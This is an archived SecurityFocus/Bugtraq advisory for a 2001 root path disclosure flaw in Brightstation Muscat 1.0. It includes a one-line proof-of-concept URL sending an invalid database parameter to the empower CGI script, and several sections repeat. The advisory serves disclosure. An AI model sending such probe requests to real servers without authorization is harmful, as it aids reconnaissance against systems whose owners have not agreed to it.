Brightstation Muscat Root Path Disclosure Vulnerability
BID:2374
Info
Brightstation Muscat Root Path Disclosure Vulnerability
| Bugtraq ID: | 2374 |
| Class: | Input Validation Error |
| CVE: |
CVE-2001-0224 |
| Remote: | Yes |
| Local: | Yes |
| Published: | Feb 12 2001 12:00AM |
| Updated: | Jul 11 2009 04:46AM |
| Credit: | Discovered and posted to Bugtraq by <[email protected]> on Feb 12, 2001. |
| Vulnerable: |
Brightstation Muscat 1.0 |
| Not Vulnerable: | |
Discussion
Brightstation Muscat Root Path Disclosure Vulnerability
Making an invalid request to a machine running Brightstation Muscat, will disclose the physical path to the root directory.
Making an invalid request to a machine running Brightstation Muscat, will disclose the physical path to the root directory.
Exploit / POC
Brightstation Muscat Root Path Disclosure Vulnerability
The following example has been provided by <[email protected]>:
http://target/cgi-bin/empower?DB=UkRteamHole
http://target/cgi-bin/empower?DB=UkRteamHole
The following example has been provided by <[email protected]>:
http://target/cgi-bin/empower?DB=UkRteamHole
http://target/cgi-bin/empower?DB=UkRteamHole
Solution / Fix
Brightstation Muscat Root Path Disclosure Vulnerability
Solution:
Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.